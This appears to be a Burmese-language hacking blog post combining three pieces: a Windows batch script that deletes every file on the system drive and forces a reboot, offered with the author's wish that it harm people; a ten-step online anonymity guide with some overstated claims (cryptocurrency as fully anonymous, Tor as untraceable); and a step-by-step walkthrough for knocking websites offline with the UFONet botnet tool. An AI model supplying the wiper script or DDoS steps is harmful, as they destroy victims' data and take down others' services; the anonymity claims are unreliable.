Virus နဲ့ Hard Diskကို Delete လုပ်နည်း

၁။ NotePad ဖွင့်လိုက်ပါ အောက်ကကုဒ်ကိုရေးချ

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

(ကရေပွင့်ကြားမှာ C, D, E, ပျက်ချင်တဲ့ Drive ရဲ့ အက္ခရာပဲထည့်)

၂။ ဖိုင်ကို name.bat လိုသိမ်း (လိုချင်တဲ့နာမည်ထည့် နောက်မှာ .bat ပါရင်ပိကော့)

လူတွေကို ဒုက္ခပေးနိုင်ပါစေ…ဟီး

Stay Anonymous 10 Steps

10 Step to Stay Anonymous Online

Lets's START

1. လျှို့ဝှက် ဘရော်ဇာမျက်နှာသုံးပါ
ဒီဟာက အင်တာနက်သုံးသူတိုင်း သိသင့်တယ်။ ကျနော်တို့ GoogleChrome, Firefox, Safari ဘရော်ဇာတွေ သုံကြတယ်။ အဲဒီဘရော်ဇာတွေမှာ  Incognito mode ဒါမှမဟုတ် Private Browsing ဆိုပြီး Page တစ်ခုရှိတယ်။ ဒီလိုမျိုး Incognito modeဟာ လုံးဝ Anonymous မလုပ်နိုင်ပေမဲ့ များစွာအကျိုးရှိပါတယ်။ Incognito သုံးရင် ဘရော်ဇာက ကိုယ်မွှေခဲ့တဲ့ Historyတွေသိမ်းမထားခြင်း၊ AutoFillingForm မှာ ကိုယ်ရဲ့ အချက်အလက် လုံးဝဖြည့်စွက်မှုမရှိခြင်း၊ Website တွေ ကျနော်တို့ရဲ့ Cookieတွေ သိမ်းမထားနိုင်ခြင်း။ Cookieတွေဘယ်လောက်အရေးကြီးလဲဆိုတာ Cookie တွေဆီက ကိုယ့်ရဲ့ Personal Data အခိုးခံရတာ ကြားဖူးမယ်ထင်ပါရဲ့။

2. VPN or Hide ip သုံးပါ
VPN(Virtutal Priavte Network) ဆိုတာ လုံခြုံပြီး လျှို့ဝှက် အင်တာနက်လှိုင်းဖြစ်ပါတယ်။ VPNက ကျနော်တို့ရဲ့ ip addressကို ဖုံးထားပြီး တခြား ip addressအတုတစ်ခု လွင့်ပေးတယ် အဲကြောင့် ကိုယ်ဘယ်နေရာကနေ ဘာသုံးနေပြီး ဘာလုပ်နေတယ် ဆိုတာ ဘယ်သူမှ မသိနိုင်ကြဘူး။ (VPN ကုမ္ပဏီတွေဟာ ကျနော်တို့ ဘယ်နေရာကနေ ဘာလုပ်နေတယ်ဆိုတာသိတယ်၊ တချို့Company တွေက အစိုးရရဲ့အမိန့်ကြောင့် User Login Dataပေးရတာမျိုးလဲရှိတယ်။ တချိူ့Companyတွေက လုံးဝမပေးကြဘူး ပြောရမယ်ဆို NordVpn က UserData သိမ်းတောင်မထားဘူး။ PaidVersion ပဲသုံးကြပါ။ FreeVersion တွေဆို သိမ်မလုံဘူး ပြီးတော့ ဂျင်းပါတတ်တယ်(အစိုးရက PublicCompany ဟန်ဆောင်ပြီး VPN freeပေးပြီး Hacker ဖမ်းလေ့ရှိတယ်)။

3.  Tor Browser သုံးပါ
Tor(the onion router)Browser က များစွာအထောက်အကူပြုပြီး အကျိုးအများကြီးရှိတယ်။ Torဟာ ကမ္ဘာပေါ်မှာ serverအများကြီးနဲ့ ကိုယ်ကိုAonymous ဖစ်အောင်လုပ်ပေးနိုင်တဲ့ ဘရော်ဇာတစ်ခုပါပဲ။ ကြက်သွန်နီ ဘရော်ဇာလို့ အလကားခေါ်တာမဟုတ်ပါဘူူး။ ကြက်သွန်နီရဲ့ အလယ်ဗဟိုဟာ အလွှာပေါင်းအများကြီးနဲ့ ဖုံးကွယ်ထားသလို TorUserကိုလဲ serverအများကြီးနဲ့ ဖုံးကွယ်ထားတာပါပဲ။ တကယ်လို့ တစ်ယောက်က ကိုယ့်ကိုခြေရာခံရင်လဲ Torကလွင့်ပေးတဲ့ signalတွေကြောင့် ဘယ်လိုမှ မမိနိုင်ဘူး။

4. Firewallကို လုံခြုံအောင်လုပ်ပါ
Firewall ဆိုတာ Hardware or Software ဖြစ်ပြီး ကိုယ့်စက်ရဲ့ အင်တာနက်နဲ့ အပြင်လောက အင်တာနက်ကို ထိန်းချုပ်ထားတဲ့စနစ်ကြီးဖြစ်ပါတယ်။ Firewallဟာ ဘယ်ဟာကိုဖြတ်သန်းခွင့်ပေးမလဲ ဘယ်ဟာကိုတားဆီးမလဲဆိုပြီး စည်းကမ်းတွေ ရှိနေပါတယ်။ ဥပမာ - Router တွေမှာရှိတဲ့ firewall ဟာ အပြင်က connectionတွေကိုတားမြစ်ထားပြီး သူ့ကိုတခြားသူက ထိန်းချူပ်မရတဲ့ Firewall နဲ့တည်ဆောက်ထားတယ်။ ကျနော်တို့မှာလဲ Firewall တွေ ကောင်းမွန်စွာအလုပ် လုပ်နိုင်အောင် updateပေးပြီး Activate လုပ်ထားရမယ်။ လိုတာတွေ Approve လုပ်ပေးထားပြီး မလိုတာတွေထုတ်ပစ်ရမယ်။ (ခြံစည်းရိုးမာလေ အိမ်ပိုလုံခြုံလေ။ Firewallမာလေ Computerပိုလုံခြုံလေ)

5. Malware တွေ သတိထားပါ
ဒီဟာက ဖြစ်နိုင်ချေများတယ်။ ကျနော်တို့က လုံခြုံမှုမရှိတဲ့ site တခုမွှေကြည့်တယ်၊ public wifi ချိတ်ဆက်မယ်ဆို ကျနော်တို့ရဲ့ ကွန်ပျူတာ(ဖုန်း)ကို Control လုပ်နိုင်ပါတယ်... controlလုပ်တဲ့သူက Malware ကိုပို့ပြီး ကိုယ်ရဲ့ screenကိုစောင့်ကြည့်ခြင်း၊ ကိုယ်ရိုက်တဲ့ စကားလုံး(email/password)ဘာညာရရှိနိုင်တယ်။ အလကားရတယ်ဆိုပြီး Wifiတိုင်းချိတ်ဆက်တာတွေ မလုပ်ဖို့ အကြံပေးပါရစေ။ Malware/Adware/Trojan ကို ဖမ်းနိုင်တဲ့ Anti-virus ဆော့ဝဲတွေသုံးကြပါ up-to-date လုပ်ထားပါ။

6. ကိုယ်ဟာကို spy လုပ်ကြည့်ပါ
ကျနော်တို့ သုံးနေတဲ့ vpn က တကယ်အလုပ်နိုင်လား၊ ဘယ်လောက် ကာကွယ်ပေးနေလဲ၊ ကိုယ်နေရာပျောက်ထားပြီး ipအတုလွင့်ပေးလားဆိုုတာ ကိုယ့်ဟာကို စမ်းသပ်ပါ။ အဲလိုစမ်းသပ်ဖို့အတွက် mybrowserinfo.com မှာသွားပြီး စမ်းသပ်နိုင်ပါတယ်။ နောက်တခုက Panopticlick ပါပဲ သူက ကိုယ့်ဘရော်ဇာဟာ ဘယ်လိုအလုပ်လုပ်နေတာပြပေးပြီး ကိုယ်ကဘယ်လို ခြေရာခံမိနိုင်လဲဆိုတာ ဘရော်ဇာကို စမ်းသပ်ပြီးပြပေးမယ်။

7. Crypto-currency သုံးပါ
တိုးတက်နေတဲ့ ခေတ်ကြီးမှာ ငွေအပေး အယူ အွန်လိုင်းမှတစ်ဆင့် လုပ်ကြနေပြီ Shopping ဆိုလဲ အွန်လိုင်းကြီးပဲ။ ATM နဲ့ငွေထုတ်တဲ့အခါ၊ CreditCardနဲ့ တခုခုဝယ်တဲ့ခါ၊ Bank နဲ့ငွေပေးဆောင်တဲ့အခါ… သူတို့က ကိုယ်ရဲ့ log info တွေ Databaseမှာ သိမ်းထားကြတယ်... အစိုးရက ယူချင်ရင်လဲ ပြပေးကြပါတယ်။ ကိုယ်က လျှို့ဝှက်ဝယ်ချင်တာကို တခြားသူရထားသော မိပြီပေါ့။ အခုခေတ်မှာ များစွာသော Company တွေဟာ crypto-currency တွေနဲ့ငွေ ပေးချေနိုင်တဲ့ ဝန်ဆောင်မှုပေးနေပြီ။ Bitcionလို တခြားCrypto-currency ကုမ္ပဏီတွေပေါ်နေပြီ... အဲလိုအကောင့်လိုချင်ရင် ကိုယ်ရဲ့အချက်အလက်တွေ မှန်ကန်ဖို့မလိုပါဘူး။ သူကဘဏ်အကောင့်တွေလိုမဟုတ်ဘူး၊ ကိုယ်ကဘယ်သူဘယ်ဝါ၊ ဘယ်သူ့ဆီက ငွေလက်ခံတယ် ငွေပေးချေတယ် ဘယ်သူမှမသိသလို ဘယ်သူ့ကိုလဲ ထုတ်မပြပေးဘူး။ လုံးဝ Anonymous ပဲ။

8. Social Media & Cloud Storage တွေမသုံးပါနဲ့
ကျနော်တို့့ဟာ SocialMedia  ကို သုံးပါတယ်။ ဒါပေမဲ့သူက ကိုယ်ကို အချိန်တိုင်း စောင့်ကြည့်တယ်။ PersonalData တွေသိမ်းဖို့အတွက် GoogleDrive, OneCloud, MediaFire, DropBox စသဖြင့်သုံးကြတယ်။ အကုန်လုံးက ကိုယ့်ရဲ့လှုပ်ရှားမှုကို စောင့်ကြည့်နေတယ်။ အဲ့တော့့ ဘာသုံးရမလဲဆိုတော့ Messenger,Viber,WhatsApp အစား ကိုယ့်ကို trace မလုပ်တဲ့ Signal,Crypto Chat, TOR Chat, Telegram သုံးကြပါ။ GoogleDrive, OneCloud, MediaFire, DropBox အစား ကိုယ့်ကို trace မလုပ်တဲ့ NextCloud သုံးကြပါ။ Gmail အစား ကိုယ့်ကို trace မလုပ်တဲ့ Proton Mail သုံးကြပါ။

9. Google, Yahoo, Bing မသုံးပါနဲ့
ငိငိတော့ မလုပ်ပါနဲ့။…ဟီး။ Popular search engine ဖြစ်တဲ့ Google, Yahoo, Bing တွေဟာ ကိုယ့်ရဲ့ ip(location),search history,email,password,birthday,gender,ph number အကုန်သိမ်းထားပါတယ်။ အဲ့တော့ ဆရာကြီး Google ပဲနေရမလားလို့မမေးနဲ့နော်။ ကိုယ့်ကို လုံးဝခြေရာမခံတဲ့ search engine ရှိပါတယ်။ ဘယ်သူလဲဆို DuckDuckGo ပေါ့။ ဘယ်သူဘာမွှေမွှေ လုံးဝ trace မလုပ်ဘူး.... သူ့ intro pageမှာ (The search engine that dont track you)တွေ့မယ်။

10. ကင်မရာ & မိုက် & HardDisk ပိတ်ထားပါ
ကိုယ်က Trojan စားခံတယ်ဆိုထား… Trojan/Malware တွေက ပုံရိုက်လို့မရအောင် ပိတ်ထား(tape နဲ့ကင်မရာကို ဖုံးထားပေါ့)... ကိုယ်အသံတွေ Record မလုပ်နိုင်အောင် မိုက်ကိုပိတ်ထား၊ ကိုယ်ကPersonalData တွေသိမ်းထားတဲ့ HardDisk ကို encryptလုပ်ထား (မထားတာအကောင်းဆုံး)။ ကိုယ်က vpn ဘယ်လောက်သုံးသုံး ထောက်လှမ်းရေးက ကိုယ်ရဲ့ဆယ်ဖီးတစ်ပုံရရင် လုံလောက်ပြီ သူတို့အတွက်။

(Concept ပိုင်းရှင်းပြတာ ကျနော့်အကျင့်ပါ။ သဘောတရား နားမလည်ပြီး ဘာမှ လျှောက်မနှိပ်ပါနဲ့လို့) (သပေါက်မပေါက်ဘူးဆို ကျနော်စာရေးသူရဲ့ ညံ့ဖျင်းမှုကြောင့်ပါလို့)

Stay Anonymous, Don’t let anyone to trace you!!!

Attack Website with botnet by D-DOS

DOS နဲ့ DDOS ဘာကွာလဲဆိုတာ မရှင်းပြတော့ဘူး။ ပြောရမယ်ဆို ၂ခုစလုံးကို Web တွေ Downကျစေရန် အသုံးပြုတာပေါ့... ဒါပေမဲ့ DDOS က အဆင့်မြင့်ပီး ပိုအစွမ်းရှိတာပေါ့ကွာ… ပိုပီးတိတိကျကျသိချင်ရင် ဒီမှာမွှေပါ။ တကယ်ဆို ဒီကောင်ကို httpsပါတဲ့ Webတွေကိုချတဲ့မျိုး ပီးတော့ ဒီကောင်ကို DrakWeb က botnet တွေဝယ်ပီး တိုက်တာမျိုးလဲရှိတယ် (ထောင်ထဲသွားချင်ရင်ပေါ့..ဟီး) ဒီနေ့တော့ webတွေကို botnetနဲ့ ဘယ်လိုချရလဲဆိုတာပြောပြမယ်

ကဲ စလိုက်ရအောင်>>
ဒီTool နမည်ကတော့ UFONET ဖစ်တယ်။ kali or android ၂ခုလုံးမှာသုံးနိုင်တယ်….ဒီမှာတော့ Linux အတွက်ပဲနော်
UFONET ရဲ့ Feautures:

• Auto-update 
• Clean code (only needs python-pycurl) 
• Documentation with examples 
• Web/GUI Interface 
• Proxy to connect to ‘zombies’ (ex: tor) 
• Change HTTP Headers (User-Agent, Referer, Host…) 
• Configure requests (Timeout, Retries, Delay…) 
• Search for ‘zombies’ on google results (using a pattern or a list of dorks) 
• Test ‘Open Redirect’ vulnerabilities on ‘zombies’ 
• Download/Upload ‘zombies’ from Community 
• Inspect a target (HTML objects sizes) 
• Set a place to ‘bit’ on a target (ex: big file) 
• Control number of rounds to attack 
• Apply cache evasion techniques 
• Supports GET/POST 
• Multithreading 
• Different search engines for dorking 
• Web interface 
• Geomapping / Visual data 
• Order ‘zombies’ to attack you for benchmarking 

အဆင့် ၁။ ။ UFONET ကို official pageက ဒေါင်းယူပါ https://sourceforge.net/projects/ufonet/ ပီးရင် Extract လုပ်ပီး ကျနော်တို့ရဲ့ အချစ်ဆုံး Terminal ကိုဖွင့်လိုက်ပါ။ အသေးစိတ်အတွက် ./ufonet –help

အဆင့် ၂။ ။ ချဖို့အတွက် zombie တွေဒေါင်းရမယ် ဒီcommandရေး ./ufonet –download-zombies

အဆင့် ၃။ ။ GUI အတွက် ./ufonet - -gui လို့ရေး ဒီCommand ရေးရင် GUI ပေါ်လာမယ် START MOTHERSHIP ကိုနှိပ် ပိးရင် သူက GUIရဲ့ optionတွေဖွင့်ပေးမယ်

အဆင့် ၄။ ။ Bonet ကိုနှိပ်.... ပီးရင်သူက optionတွေပြနေမယ်

အဆင့် ၅။ ။ List Zombies နှိပ်ရင် သူကတိုက်ချမယ့် zombieတွေပြပေးမယ်

အဆင့် ၆။ ။ အခု Attack သာနှိပ်တော့ ပီးရင် Target မှာ ချချင်တဲ့ webရဲ့ url or ip address ထည့် ကိုယ်လိုချင်သလောက် round numberထည့် START ကိုရဲရဲဂျီး နှိပ်လိုက်....
(အရင်ဆုံး ဘယ်zombieတွေနဲ့ ချနေတယ်ဆိုတာ မြင်မယ် ပီးရင် Target webက အိပ်ပျော်သွားတာတွေ့ရမယ်(Down သွားတာတွေ့ရမယ်) 

 #Edu_Purpose#Use_for_own_risk